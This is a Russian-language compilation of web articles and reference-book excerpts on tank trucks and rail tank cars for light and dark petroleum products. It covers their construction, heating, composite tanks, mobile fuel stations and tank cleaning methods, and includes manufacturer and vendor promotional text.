Цистерны для тёмных и светлых нефтепродуктов: устройство, очистка

Несмотря на то, что нефтепродукты относятся к категории опасных легковоспламеняющихся грузов, а в конструкциях цистерн необходимо детально учитывать химические и физические свойства различных видов топлива, рынок автоцистерн динамично развивается, причем отечественный производитель занимает на нем достойное место.

Перевозка любого топлива – сложная и ответственная задача, которая требует соблюдения правил безопасности и особого внимания.

Транспортировка нефтепродуктов регулируется сегодня Федеральным законом № 259-Ф3, принятым в 2007 г.

и именуемым «Устав автомобильного транспорта и городского наземного электрического транспорта», а также Европейским соглашением о международной перевозке опасных грузов.

Прежде всего надо отметить, что транспортные средства, участвующие в перевозке нефтепродуктов, должны отличаться особой надежностью, потому что маршруты движения часто имеют большую протяженность, а учитывая огромную территорию страны, еще не редкость у нас участки с некачественным дорожным покрытием. Сеть же российских автосервисов далеко не совершенна.

Кроме того, как было сказано выше, в конструкции автоцистерны необходимо учитывать свойства транспортируемого вида нефтепродуктов. Например, при работе с темными нефтепродуктами, имеющими высокую вязкость, для предотвращения их застывания при понижении температуры нужны цистерны со встроенным подогревом.

Например, в битумовозах температура битума не должна опускаться ниже 180 °С, а оптимальная температура его транспортировки 220 °С.

Для подогрева темных нефтепродуктов в автоцистернах используются специальные термогенераторы с автономными двигателями, работающие на дизтопливе или керосине. В этом случае подогрев содержимого цистерны происходит независимо от работы двигателя тягача.

Внутри подогреваемой цистерны, как правило, имеется замкнутая система труб, заполненная термоносителем. Это вещество разогревается генератором до заданной температуры, а затем циркулирует по трубам, не позволяя перевозимым продуктам застыть. Важнейшим требованием при работе подобных конструкций является герметичность.

Термоноситель не должен ни в коем случае контактировать с нефтепродуктами, находящимися в цистерне.

Надо сказать, что несмотря на большую потребность в цистернах с автономным подогревом, особенно в регионах с холодным климатом, выпускает их в России только несколько предприятий.

Компания «Сеспель» из Чебоксар утепляет по согласованию с заказчиком цистерны битумовозов и мазутовозов термоизоляционным слоем минеральной ваты толщиной 50, 100, 150 мм. Кроме того, специалисты компании подобные автоцистерны предлагают комплектовать нагревательными системами двух типов.

Более популярны у покупателей системы подогрева, в основе которых лежит использование дизельных горелок, поскольку с их помощью можно поддерживать температуру битума и мазута на необходимом уровне во время движения автомобиля. Конструкция состоит из нескольких труб, проложенных внутри цистерны.

В трубу с одной стороны через форсунку подается жидкое топливо, и там, в трубе, оно горит. А продукты горения отводятся в атмосферу с другой стороны трубы. Температура нагрева автоматически регулируется термодатчиками.

При использовании нагревательной системы второго типа по трубам, проходящим также внутри цистерны, прогоняется разогретый до 200 °С пар. Недостатком метода является, во-первых, то, что для работы системы нужен внешний источник пара.

А во-вторых, мазуто- и битумовозы вынуждены простаивать, пока содержимое цистерн не нагреется до нужной температуры.

Затем водитель, двигаясь по маршруту, должен контролировать температуру груза, чтобы не допустить его отвердевания в цистерне.

Для сохранения битума в цистерне битумовоза в жидком состоянии ПАО «НЕФАЗ», входящее в группу предприятий ПАО «КАМАЗ», также оснащает автоцистерны системой дополнительного подогрева, которая включает 40-литровый топливный бак, две жаровые трубы, две стационарные горелки, работающие на дизтопливе, топливопроводы от бака к горелкам, воздухопроводы и редукционный пневмоклапан.

Также нужно отметить, что повышенная вязкость темных нефтепродуктов вызывает сложности как на этапе загрузки цистерны, так и при ее выгрузке. Заправлять цистерну необходимо как можно полнее, а сливать битум максимально быстро, остаток в цистерне должен быть минимальным.

Для заправки используют специальные пожаро- и взрывобезопасные насосы, поскольку пары темных нефтепродуктов могут взрываться при попадании малейшей искры.

Как правило, подобные насосы имеют автономный привод, они работают либо от генератора, либо имеют собственный топливный бак.

Светлые нефтепродукты и их «светлые» стороны

При работе со светлыми нефтепродуктами сложностей с заливкой продукта в цистерну и сливом перевезенного продукта практически не возникает.

Для этого используются те же насосы, что и при загрузке/ выгрузке темных нефтепродуктов, с той лишь разницей, что подогревать перекачиваемые вещества не требуется.

Однако при изготовлении цистерн производителям приходится учитывать, что светлые нефтепродукты интенсивно испаряются и может произойти взрыв паров содержимого цистерны.

Пары керосинов различных марок могут быть взрывоопасны при температурах выше +50 °С, пары дизтоплива опасны только при температурах выше +55 °С, а пары бензина пожароопасны при любых температурах. Если поднести огонь к открытой емкости с бензином, он вспыхивает мгновенно при любых температурах, пары же взрывоопасны только в пределах объемной концентрации 2~6%.

Поэтому при сваривании средней части цистерны для светлых нефтепродуктов обязательно устанавливаются кольца жесткости, а внутренняя ее часть, как правило, оснащается перегородками-волногасителями, которые снижают трение жидкости о поверхности стенок цистерны.

В конструкциях цистерн последних лет вместо перегородок стали применять торосферические днища. К тому же такой конструкторский прием делает цистерну более прочной.

Для того чтобы избежать излишней нагрузки на трубопроводы и сливные коллекторы при столкновениях и не нарушить герметичности системы, в большинстве цистерн сливные коллекторы и трубопроводы со­единяются через резиновые компенсаторы.

Оригинальное решение применили инженеры компании «Бецема» в бензовозах. Донные клапаны имеют специальную проточку на корпусе, которая позволяет при ударе отламываться наружной части вместе с механизмом открывания. При этом донный клапан остается закрытым.

Используемые сегодня системы отвода паров в подземный резервуар непосредственно из цистерны практически устранили риск взрыва бензовозов при погрузке/ разгрузке. Бензовозы оснащаются огневыми предохранителями, дыхательными устройствами, датчиками, контролирующими уровень залитого топлива.

Сегодня все шире применяются такие средства безопасности, как устройства беспроливной стыковки, независимые запорные устройства, адаптеры с фланцами переменного диаметра. Слив светлых нефтепродуктов также имеет свои особенности: при прохождении через сливные патрубки больших объемов топлива за счет возникающего трения патрубки могут быстро изнашиваться.

Для снижения действия трения на внутреннюю поверхность патрубков наносится слой специального антифрикционного покрытия.

Мобильные АЗС: популярность растет

Автоцистерны для транспортировки светлых нефтепродуктов все чаще сегодня комплектуются узлами учета, превращающими их в передвижные заправочные станции.

Этот вид спецтехники сегодня востребован на стройплощадках, в АТП, но чаще в труднодоступных, удаленных местах. Автоцистерна с блоком учета расхода ГСМ может быть полезна и лесозаготовителям, и геологам.

Существуют даже заправочные модули, для функционирования которых электроэнергия не нужна. В них используются механические счетчики и механические насосы.

Большой ассортимент передвижных АЗС предлагает ПО «Пензаспецавтомаш». Производство мобильных и стационарных АЗС под торговой маркой Benza – одно из приоритетных направлений в деятельности предприятия.

Пензенские инженеры добились того, что срок окупаемости их МТЗС при интенсивном использовании может составлять всего несколько месяцев, и покупателю сегодня зачастую выгодно купить мини-АЗС «Пензаспецавтомаша», чем устанавливать стационарную заправку.

Тем более, что все пензенские МТЗС сертифицированы и соответствуют действующим российским нормам.

Поставками высококачественного оборудования для АЗС и дополнительным оснащением автоцистерн занимается известная компания ГК «Новые технологии».

Являясь дилером известной компании PiUsi, предприятие успешно реализует на отечественном рынке серию модульных мини-АЗС Cube из Италии.

Ассортимент оборудования для мобильных АЗС, топливораздаточные колонки с системами учета сливаемого топлива, датчики уровня топлива в цистерне, предлагаемые ГК «Новые технологии», смогут удовлетворить любого потенциального покупателя.

Цистерны из композитных материалов «подключаются» к доставке ГСМ

Тенденцией последних лет стало все более активное использование мобильных резервуаров из неметаллических материалов. Сегодня уже можно назвать распространенной доставку нефтепродуктов с помощью флекситанков – контейнерных вкладышей из полимерного материала.

ГК «Нефтетанк» выпускает так называемые нефтетанки объемом от 0,025 до 250 м3 и даже до 500 м3.

Мягкие резервуары небольшого объема, вставленные в контейнеры, позволяют транспортировать нефтепродукты автотранспортом, а в нефтетанках больших объемов удобно хранить ГСМ в течение длительных сроков.

Нефтетанки производятся из эксклюзивного немецкого материала а на европейском оборудовании, с полностью автоматизированным технологическим процессом изготовления, организованным в цехах ООО «Нефтетанк», реализуется запатентованная технология так называемого «двойного шва».

ООО «Завод Специальных Машин» из г. Челябинска специализируется на изготовлении емкостей из композиционных материалов. Недавно предприятие представило цистерны, изготовленные из химически стойкого стеклопластика.

Материал обладает отличной устойчивостью к химически активным средам, не уступает по долговечности и прочности металлу. Цистерны, выпускаемые заводом, не корродируют, не становятся хрупкими даже со временем, их прочность в 2–3 раза выше прочности алюминия и в 9 раз превышает прочность ПВХ.

Преимуществ у инновационного пластика много: он не подвергается электрохимической коррозии, стеклопластик устойчив к деформациям, долговечен, масса пластиковых цистерн гораздо меньше металлических, а значит, полезная грузоподъемность такого нефтевоза выше.

Сегодня «Завод Специальных Машин» монтирует стеклопластиковые цистерны на шасси «Урал-5557».

ООО «Группа компаний ПОЛекс» с головным офисом в Нижнем Новгороде также освоила выпуск цистерн из стеклопластика. «ПОЛекс» монтирует свои изделия на шасси грузовых машин, а также на рамы прицепов и полуприцепов.

В компании заявляют, что транспортировать в их цистернах можно любые виды химических и нефтепродуктов, а форма цистерны по желанию заказчика может быть цилиндрической или эллиптической.

Размеры и способ крепления цистерн позволяют перевозить емкости, изготовленные в компании «ПОЛекс», на стандартных контейнеровозах и универсальных прицепах-контейнеровозах.

Стеклопластиковая цистерна помещается в коробчатую конструкцию, которая обеспечивает защиту от повреждений в случае аварий при транспортировке, а поддон в зоне сливного патрубка и обрамление в зоне заправочной горловины предотвращают проливы агрессивных жидкостей как при заправке, так и при сливе содержимого цистерны.

При изготовлении топливных цистерн из стеклопластика на производстве применяется эпоксивинилэфирная смола Derakane momеntum, стойкая к воздействию топлива и агрессивных компонентов.

Вещество разработано компаниями Epoxy Products и Intermediates, входящими в состав международной инжиниринговой компании Ashland Inc.

Более чем в 100 странах сотрудники корпорации Ashland предлагают химические продукты и технологии специального назначения, открыто представительство компании и в России.

Смолы Derakane и Derakane momentum обладают превосходной химической стойкостью и наилучшим образом подходят для применения там, где требуются подобные изделия. При изготовлении цистерн в «ПОЛекс» применяется комбинированный метод: напыление и намотка. В зависимости от диаметра цистерны толщина стенки топливного резервуара может составлять от 5 до 18 мм.

Завод компании АО «Флотенк» под Санкт-Петербургом выпускает стеклопластиковые автоцистерны собственного производства, предназначенные для транспортировки и временного хранения любых видов жидкостей, в том числе и нефтепродуктов.

Высокотехнологичные процессы намотки и применение современных смол позволили добиться заводчанам высоких показателей прочности, химической стойкости и долговечности. Диапазон рабочих температур стеклопластиковых цистерн «Флотенк» – от –70 до +60 °С.

В 2013 г. компания открыла под Екатеринбургом второй собственный завод по выпуску композитных изделий, поскольку спрос на продукцию «Флотенк» растет.

Цистерны компании проходят все необходимые лабораторные испытания, качество изделий подтверждается сертификатами соответствия, а также разрешением «Ростехнадзора».

Каждое изделие перед поставкой покупателю, как утверждают на предприятии, всесторонне проверяется специалистами ОТК.

Рынок автоцистерн для транспортировки нефтепродуктов в стране развивается, причем радует, что новейшее направление – выпуск цистерн для ГСМ из полимерных составов – уже освоено многими отечественными производителями и уверенно совершенствуется.

Российские производители полимеров сегодня создали мощности, оснащенные наиболее современным и производительным технологическим оборудованием, они выпускают продукцию мирового уровня качества.

Так что отечественным компаниям по производству автоцистерн для нефтепродуктов из стеклопластика недостатка в сырье в обозримом будущем не будет.

Источник: https://os1.ru/article/13738-avtotsisterny-dlya-transportirovki-nefteproduktov

Цистерны для нефтепродуктов

Что такое цистерна ?

Продукты нефти относят к опасным наливным грузам, которые требуют соблюдения ряда жестких правил при их транспортировке. Один из первых пунктов этого свода предполагает использование специальной тары для перевозки – цистерн.

Назначение

Сфера применения цистерны для перевозки нефтепродуктов ограничена. Данные емкости применяют для транспортировки с нефтебазы:

  • к топливораздаточной колонке;
  • к промежуточным топливохранилищам;
  • на заправочные станции для заливки в бак самолета, трактора, другой тяжелой техники.

Современная емкость может использоваться как для транспортировки светлых нефтепродуктов (бензины, дизель, печное топливо), так и темных нефтепродуктов.

Предложение рынка цистерн

На современном рынке специальных емкостей можно купить цистерну для нефтепродуктов разного объема, материального исполнения, формы, вместительности. Они выполняются из листового металла сварным методом.

Как правило, в изготовлении современных резервуаров применяют малоуглеродистую или коррозионностойкую сталь. В первом случае технология изготовления предусматривает дополнительную обработку корпуса антикоррозионными составами на базе:

  • эмали;
  • эпоксидной смолы;
  • пластмассы;
  • цинка;
  • свинца и других материалов.

Реже встречается предложение купить цистерну для нефтепродуктов из пластика или алюминия. Выбор материала в любом случае прямо зависит от характера среды, с которой будет применяться оборудование.

По форме сегодняшние конструкции тоже могут отличаться. Наибольшее распространение получили варианты с овальным сечением. Но кроме них, существуют модели с прямоугольным и круглым днищем. Способ размещения на транспортной платформе тоже может отличаться. Здесь, опять ж, есть популярный вариант – горизонтальное расположение, но для него существуют и альтернативы.

Классификация цистерн для нефтепродуктов

В зависимости от вида транспорта, на котором перемещаются резервуары, они делятся на автоцистерны и вагоны-цистерны для нефтепродуктов. О первых мы подробно расскажем чуть ниже, а вторые, в свою очередь, делятся на 2 подкласса.

  1. Цистерны для нефтепродуктов общего назначения, они же универсальные – наиболее распространенный вариант. Используются для транспортировки различных составов в жидком состоянии. Не оснащается дополнительной системой подогрева для загрузки/выгрузки среды при изменении окружающей температуры. В этой категории тоже есть свое деление для сокращения временных и финансовых затрат на подготовку тары к работе с продуктами разных классов:
    • Цистерны для перевозки светлых нефтепродуктов используются в целях транспортировки различного топлива (керосин, бензиновые и дизельные составы, лигроин и другие субстанции). Для безопасности доставки легковоспламеняющихся светлых нефтепродуктов тара оснащается колпачными системами верхнего слива.
    • Цистерны для перевозки темных нефтепродуктов. Предназначена для перевозки вязких составов – минеральных масел, мазутов, битумов, нефти. Оборудуется системой слива снизу.
  2. Железнодорожная цистерна для нефтепродуктов специального назначения.

В сопроводительной документации к различным видам оборудования для транспортировки продуктов нефти обязательно указывается и их назначение, и данные по размещению сливных приборов. Производитель также обязан предоставить подробную инструкцию по использованию с указанием конструктивных отличий или особенностей, если таковые имеются.

Автоцистерны

Автоцистерна для нефтепродуктов представляет собой автотранспорт, оборудованный в грузовой части емкостью для перевозки огнеопасных товаров (другое название – бензовоз). Здесь тоже имеет место деление на тару для транспортировки светлых нефтепродуктов и темных. В первом случае при изготовлении машин применяются самые строгие требования к обеспечению пожарной безопасности. Бензовозы для светлых нефтепродуктов могут иметь конструкцию, позволяющую за рейс перевести до 5 видов топлива.

Другое название автоцистерны для темных нефтепродуктов – битумовоз. Она рассчитана на доставку вязких сред, потому оснащается подогревателями.

Поддержание температуры сред на уровне 250 градусов выше нуля позволяет исключить задержки на этапе слива при сниженных температурах воздуха.

Благодаря такому конструктивно-техническому решению битумовоз может доставлять темные нефтепродукты на далекие расстояния.

Объемы автоцистерн

В зависимости от требуемого объема цистерны, ее назначения и нюансов технического задания заказчика, который планирует купить оборудование для работы в конкретных условиях, автоцистерна может быть изготовлена:

  • из стали (нержавейка или конструктивная);
  • сплава алюминия;
  • стеклопластика.

Объем цистерны – одна из ключевых характеристик оборудования – прямо зависит от ее материального исполнения.

Так, самой высокой вместимостью отличаются типы цистерн для нефтепродуктов, выполненных из конструктивной стали. Они тяжелее остальных (7–9 т), но могут вмещать до 50 тыс. л продукции.

Объем цистерны в этом случае прямо зависит от количества отсеков, которых может быть от 3 до 5.

Объем цистерны из нержавеющей стали составляет 34 тыс. л. Она вмещает до 4 отеков и весит 6,5 т. Алюминиевый аналог легче (5,7 т), но вместительнее (объем цистерны – 36 тыс. л).

Наименьшей емкостью (но самой выгодной ценой) обладают стеклопластиковые варианты. В зависимости от количества отсеков они включают 5–30 тыс. л. При этом все типы автоцистерн, кроме последнего, работают со светлыми нефтепродуктами. Стеклопластиковые бензовозы могут использоваться как с топливом, так и с темными нефтепродуктами.

Купить цистерны по цене производителя

Качество цистерны под нефтепродукты, ее надежность, герметичность систем слива, адаптированность к российским дорогам и климатическим условиям – ключевое условие безопасной доставки опасного наливного груза. Если вы хотите получить гарантированное качество изделий по выгодной цене, обращайтесь к проверенному производителю.

НПО «СпецНефтеМаш» занимается изготовлением оборудования для транспортировки продуктов нефти разного объема цистерн и материального исполнения. В нашем каталоге есть надежное оборудование для перевозки на любые расстояния.

Цена цистерн для нефтепродуктов лишена надбавок, а надежность подтверждена гарантиями, соответствием ГОСТ и отзывами постоянных покупателей. Если вы планируете купить цистерну для нефтепродуктов по оптимальной цене, обращайтесь. Наши специалисты помогут определиться с тонкостями составления заказа и выбором модели.

Источник: https://snmash.ru/articles/163-tsisterny-dlya-nefteproduktov.html

Как очистить цистерну от нефтепродуктов

как очистить цистерну от нефтепродуктов

Нефтепродукты принято использовать в качестве топлива, смазочного материала, при прокладке новых и ремонте старых дорог, а также для многих других целей, которые имеют крайне важное значение в жизни современного человека.

Они представляют собой определённые смеси углеводородов и их производных.

Нефтепродукты, как правило, имеют вязкую маслянистую структуру и обладают высоким уровнем впитываемости. Доставляются к месту назначения данные вещества в цистернах.

Периодически эти ёмкости могут потребовать ремонта или замены их наполнения на другое вещество. В этом случае цистерна требует качественной очистки.

Проверенные способы очищения цистерн

Как очистить цистерну от нефтепродуктов специалисты думали достаточно долго, и проведя массу испытаний изобрели два основных способа.

Метод пропарки

Нефтепродукты имеют одну особенность, при высокой температуре они становятся более жидкими и теряют свою вязкость. Поэтому для того, чтобы очистить цистерну, её хорошо нагревают. Делается это при помощи специальной пропарочной станции. После нагрева, нефтепродукты удаляются с поверхности.

Данный метод не отличается высокой эффективность и обладает рядом следующих недостатков:

  • необходимость наличия специального оборудования;
  • возможность проведения работ исключительно специально обученным персоналом;
  • высокий уровень опасности во время проведения работ;
  • низкая эффективность.

Поэтому решая, как очистить цистерну от нефтепродуктов стоит учитывать все возможные риски.

Метод промывки

Промывка цистерн от остатков нефтепродуктов осуществляется с использованием специально разработанных химических средств. Концентрированный очиститель разводиться в полном соответствии с инструкцией, заявленной производителем.

После приготовления раствор наносится на поверхность посредством пульверизатора и выдерживается определённое время.

Чаще всего срок выдержки составляет не более получаса. В это время на поверхности цистерны происходит химическая реакция и нефтепродукты полностью растворяются.

Затем ёмкость промывается чистой водой, подаваемой под высоким давлением. Загрязнение смывается достаточно быстро.

Метод обладает рядом следующих преимуществ и поэтому считается самым подходящим для этих целей:

  • быстрая эффективная очистка больших площадей;
  • полное растворение остатков нефтепродуктов;
  • возможность проведения работ без привлечения специалистов;
  • безопасность для человека.

Необходимо учитывать, что во время промывки цистерн образуется большое количество воды, загрязнённой остатками нефтепродуктов. Поэтому проводить работы следует возле сточного отверстия, чтобы они могли туда стекать. Иначе есть вероятность загрязнения участка, на котором стояла цистерна.

Также пред тем, как очистить цистерну от нефтепродуктов, нужно надеть одежду, которую не жалко будет выкинуть в случае чего и запастись средствами защиты – респиратором и перчатками.

Рекомендуем

Docker GYM — профессиональное средство для удаления битума, гудрона, битумных мастик, битумных лаков, герметиков. Предназначен для наружных и внутренних работ. Гель. Не содержит кислоты.

Подробнее

Как отмыть гудрон с пола

Чем очистить от битума

Источник: https://dockermsk.ru/ochistka-ot-bituma/kak-ochistit-cisternu-ot-nefteproduktov

ПОИСК

    Заданием на проектирование ППС устанавливается суточная программа по очистке и промывке цистерн, соотношение между цистернами из-под светлых и темных нефтепродуктов, а также бункерных полувагонов. Обычно ППС нефтеперерабатывающих заводов проектируются на обработку 400—600 цистерн и 50— 100 бункерных полувагонов в сутки. [c.

31]

    Для выполнения всех перечисленных выше операций в составе ППС предусматриваются стойла для горячей обработки цистерн насосная станция для подачи воды на промывку цистерн вакуумная насосная компрессорная машинная станция для приготовления и подачи воздуха к костюмам промывальщиков ангар для наружной обмывки цистерн насосная для перекачки битума тепловая камера для обработки бункерных полувагонов для битума слесарно-механическое и электроремонтное отделения отделение химчистки насосная для перекачивания нефтепродуктов химическая лаборатория помещение для обогрева промывальщиков на эстакаде здравпункт столовая бытовые и вспомогательные помещения. [c.32]

    Концентрация веществ, вредных для цементного камня, может значительно повышаться в грунтовых водах при аварийных розливах жидкостей и неисправностях устройств, предназначенных для отвода жидкостей при промывке цистерн и заводской аппаратуры. [c.187]

    При выявлении в цистернах или бочках не соответствующих их назначению газов или веществ, которые в соединении с наполняемым газом могут образовать взрывоопасные пли горючие соедииения, ати газы или вещества должны быть удалены (промывкой цистерн или бочек соответствующим раство-рите.тем или другим безопасным способом). [c.79]

    Допуск людей внутрь цистерны разрешается только после промывки цистерны п продувки ее воздухом до отсутствия паров аммиака в цистерне (определяется анализом). [c.356]

    Промывка цистерн купоросным маслом ведется шлангом со специальными наконечниками таким образом, чтобы через верхний люк обмыть всю внутреннюю поверхность цистерны и в то же время, чтобы в цистерне промывочного купоросного масла скопилось не более чем на 300 мм по высоте. [c.362]

    После промывки цистерн водой производится чистка изнутри вручную (очистку цистерн производить при наличии слоя грязных осадков в них не свыше 20 см). [c.362]

    В процессе хранения и транспортирования чистой каустической соды необходимо исключить возможность поглощения щелочью двуокиси углерода из воздуха, а также загрязнение ее продуктами коррозии стенок баков-хранилищ и цистерн. Для перевозки применяют цистерны из нержавеющей стали цли цистерны, защищенные гуммировкой.

За границей для перевозки чистой каустической соды используются также цистерны, выложенные изнутри листовым никелем. Цистерны для перевозки каустической соды должны быть закреплены за заводами, так как при использовании цистерн от перевозки другой продукции остатки воды после промывки цистерн загрязняют каустическую соду. [c.

249]

    Технология обработки цистерн предусматривает удаление остатка мазута, промывку или пропарку и протирку или сушку котла. Остатки мазута, как правило, удаляют путем пропарки пли промывки цистерн.

Значительные остатки обусловливают большую продолжительность пропарки.

Для улучшения прогрева и удаления остатка применяют двухсторонние паровые эжектирующие насадки [42], которые значительно сокращают продолжительность зачистки цистерн и расход пара. [c.129]

    Принципиальная схема установки для механизированной промывки цистерн представлена на рис. 3. 20. Отстойник 1 заполняют водой, и подогревают ее при помощи змеевикового пароподогревателя до температуры 80—90° С. Одновременно в баке 2 приготовляют концентрированный (25—30%) раствор моющего препарата. Для этого порошкообразный препарат разводят в теплой воде и раствор перемешивают паром. Для дозирования концентрированного раствора во всасывающую линию насоса 3 установлен эжектор 4. В насосе и напорном трубопроводе происходит перемешивание концентрированного раствора с водой [c.130]

    Новая технология обработки цистерн внедрена на ряде промывочно-пропарочных станций МПС и выгодно отличается от ручной зачистки.

Простои цистерн под обработкой сокращаются на 40—50%, в связи с чем возрастают пропускная способность станций и оборот цистерн.

Помимо понижения сброса сточных вод, уменьшается также расход пара и значительно улучшаются условия труда и качество промывки цистерн. [c.131]

    Сточные воды нефтяной промышленности являются одним из главных источников загрязнения водоемов.

Загрязнение воды нефтепродуктами происходит не только при добыче и переработке нефти, но и при перевозке ее водным транспортом, при использовании нефтепродуктов в качестве топлива для судовых двигателей, при промывке цистерн нефтеналивных судов, а также в результате стока воды с загрязненной нефтепродуктами территории суши. [c.50]

    На рис. 20 показана принципиальная схема канализации пропарочного пункта железнодорожной станции с использованием очищенных сточных вод вновь для промывки цистерн. [c.101]

    Примечание. Если цистерна сильно загрязнена, а также в зимний период, промывку цистерны следует производить горячей водой с температурой до 80 °С. [c.688]

    На всех промывочно-пропарочных пунктах в схеме канализации очищенные сточные воды должны возвращаться на промывку цистерн (система оборотного водоснабжения). [c.101]

    Производственные сточные воды на молочном заводе состоят в основном из воды промывки и очистки бутылок, бидонов, аппаратуры и производственных помещений (рис. 77).

В гигиеническом отношении интерес представляют воды промывки цистерн и бидонов, в которых привозят молоко, а также шлам от центрифуг. Эти воды могут содержать возбудителей болезней пасти, копыт, а также туберкулеза.

В качестве предупредительной меры [c.291]

    Важным фактором улучшения работы производства каустической соды по ферритному способу является использование в ферритных печах природного газа вместо мазута.

При работе на природном газе упростится внутризаводское топливное хозяйство, отпадет необходимость в резервуарах для хранения мазута, станциях для слива мазута и промывки цистерн и т. п.

Кроме того, природный газ более экономичен стоимость его примерно в два раза ниже стоимости мазута (в пересчете на условное топливо). [c.89]

    На рис. 1У-5 приведена технологическая схема установки для промывки цистерн. [c.212]

Рис. 1У-5. Схема установки для промывки цистерн

    При промывке цистерн после отсоса меланжа их сначала обрабатывают купоросным маслом, которое нагнетается к брандспойту 5 насосом 14 со склада и тем же насосом 14 возвращается на склад через бурак 3. Дальнейшая обработка цистерн выполняется в этом случае так же, как при промывке их после серной кислоты. [c.214]

    Люк закрывается кожухом. Нижний лист в середине котла имеет углубление, в которое заходит сливно-наливная труба, вследствие чего обеспечивается полный слив продукта. На верху котла имеется отверстие для барботера, который служит для промывки цистерны. Котел оборудуется теневой защитой. Условное рабочее давление в котле — 0,45 МПа. [c.79]

    Внеочередные промывки цистерн производятся при необходимости их внеочередного осврвдетельствовапия (см. п. 9 настоящей Инструкции ) при обнаружении в цистернах посторонней жидкости или газов (см. п.

16 настоящей инструкции) при наличии в цистерне некачественного аммиака, а также в случае необходимости ремонта цистерны, связанного со снятием крышки люка и с работами внутри котла цистерны. [c.

352]

    При каждой внеочередной промывке цистерны ответственное лгщо предприятия выполняет внутренний осмотр котла цистерны. Результаты осмотра заносят в паспорт котла при этом соответственно отодвигаются сроки очередного внутреннего осмотра цистерны. [c.352]

    Список танкерных аварий можно было бы продолжить, но все же их доля в нефтяном загрязнении моря сравнительно невелика. В три раза больше поступает нефти в акватории за счет промывки цистерн танкеров и сброса льяльных вод.

В четыре раза интенсивнее загрязняют моря и океаны нефтехимические заводы, почти столько же нефти от аварий на морских буровых. Рекорд по загрязнению морских вод принадлежит нефтяной скважине Иксток-1 у п-ва Юкатан в Мексиканском заливе. Авария случилась в 1979 г., ежедневно в акваторию выливалось 4 тыс.

т нефти скважина фонтанировала более месяца, вылив почти 0,3 млн. т нефти. [c.158]

    Жидкие продукты, вырабатываемые в больших количествах, отправляются в железнодоржных цистернах способы их наполнения и взвешивания не отличаются от способов приема жидкого сырья. Дополнительной операцией является промывка цистерн водой и различными растворами, проводимая в специальных общезаводских станциях, обычно сооружаемых по типовым проектам. [c.112]

Источник: https://www.chem21.info/info/863797/

Промывочно-пропарочный комплекс для очистки внутренних поверхностей ЖД цистерн. Прибыль 34млн в год! — SJR Сканджет Руссланд — Автомойки и освещение

ООО «Сканджет» предлагает промывочно-пропарочный комплекс (или паропропарочный комплекс) для быстрой и качественной пропарки и промывки внутренних поверхностей вагонов цистерн от углеводородных остатков.

Промывка осуществляется под погрузку и проведения ремонтно-профилактических работ, с остатками темных до 500 мм по высоте котла цистерны при полном сборе смытого нефтепродукта.

Качество промывки вагонов цистерн соответствует требованиям ГОСТ 1510-84.

Технологический процесс представляет собой непрерывный замкнутый цикл пропарки и промывки, с применением метода оборотного водопользования, при котором ТОВ (техническая оборотная вода) используется многократно.


Предлагаемое технологическое решение, основано на применении ТОВ (технической оборотной воды) с добавлением обезжиривающего реагента. Пополнение нового объема воды может производиться по мере необходимости при уменьшении объема в основной емкости, что способствует экономному расходу экологически безопасного промывочного средства.

Экологически безопасное промывочное средство – обезжиривающий реагент не является растворителем, принцип работы средства заключается в избирательном воздействии на длинные цепи углеводородных соединений, чем и обусловлено удаление органических загрязнений (нефтепродуктов) с промываемой поверхности, поэтому нет никаких агрессивных воздействий на поверхность металла, лакокрасочных покрытий, резины, кожи. Обезжиривающий реагент отвечает современным требованиям экологической безопасности, не требует утилизации не горюч, не токсичен, не абразивен, не канцерогенен, полностью биологически разлагаем, обладает выраженными деэмульгирующими свойствами (не создает однородную эмульсию), умягчитель, с антистатическим и антикоррозионным действием для операций промывки, обезжиривания и пассивации (защиты от коррозии) металлических поверхностей от нефти и нефтепродуктов.

В процессе промывки цистерн выделяются механические и углеводородные загрязнения, на которые воздействует обезжиривающий реагент посредством вытеснения из состава воды на поверхность нефтесодержащих компонентов, с четким разделением фаз).

Дополнительное аппаратное оформление позволяет полностью выделить механические и углеводородные соединения из промывочного состава в отдельную емкость. Извлекаемые отходы могут быть использованы на производствах смазок, печного топлива и асфальтонаполнителях.

Специалисты компании разработали технологию, при которой нефтепродукты, получаемые при обработки котла цистерны («СНО»), обезвоживаются и могут использоваться в парогенераторной установке, т.к. обводненность продукта не превышает 1,5%.

Суть применения данной технологии состоит в том, что:
1. Топливом для парогенераторов является нефтепродукты, собранные после промывки цистерн (в том случае, если производиться пропарка и промывка как мазутных/нефтяных цистерн, так и бензиновых/дизельных)
2.

Не требуется замена ТОВ и промывочного средства, необходима лишь корректировка раствора добавлением обезжиривающего реагента, при этом, в автоматическом режиме идет полная очистка от механических примесей и отмытых нефтепродуктов, которые утилизируются или используются по Вашему усмотрению.
3.

Снижается до минимума отрицательное воздействие на окружающую среду, и соблюдаются все экологические нормы и требования на производстве.
4.

Вся работа промывочно- пропарочного комплекса производиться в замкнутом цикле, так как химический реагент выдерживает температуры до +300 С и не разлагается, преобразуется в пар и производиться быстрая и качественная обработка стенок цистерны.
5.

Дегазация внутреннего пространства котла цистерны происходит одновременно с пропаркой (так как в паре присутствует химический реагент), что исключает возможность самопроизвольного детонирования котла цистерны. (на ст.

Пуровске производили обработку цистерн предназначенных для перевозки газового конденсата)
Комплекс имеет возможность подключения к энергосетям предприятия, при необходимости предусмотрен автономный собственный источник питания (дизель-генератор).

— диапазон рабочих температур -40°С+50°С градусов,
— продолжительность смены 12 часов,
— количество основного персонала в одну смену 4 человека,
— потребляемая мощность – до 100 кВт,
— соответствует требованиям пожаровзрывобезопасности категории В-1а,
— соответствует требованиям экологической безопасности,
— гарантия 12 месяцев, гарантийное и послегарантийное обслуживание,
— срок эксплуатации 10 лет.
Уникальность данного метода:
• Высокая экологическая безопасность – работа промывочно -пропарочного комплекса в замкнутом режиме и использование специальных моющих средств, позволяющих полностью собирать смытые остатки, что позволяет исключить вредное воздействие на окружающую среду.
• Мобильность промывочно-пропарочного комплекса – позволяет размещение комплекса как в стационарном варианте, на железнодорожной платформе, а также на автомобильном шасси, что намного расширяет спектр оказываемых услуг (очистка автоцистерн непосредственно на предприятиях автотранспорта, очистка танков нефтеналивных судов в порту)
• Высокая рентабельность – основана на сокращении энергозатрат.
• В пять раз увеличивается объем промываемых цистерн – за счет увеличения температуры моющего состава до 90 С и подачи пара до 160 С, тем самым снижается время очистки цистерны. Моющий раствор переводится в парообразное состояние, что позволяет в зимний период резко сократить время разогрева цистерны до рабочих температур мойки 80-85 С.
• Отсутствие очистных сооружений.
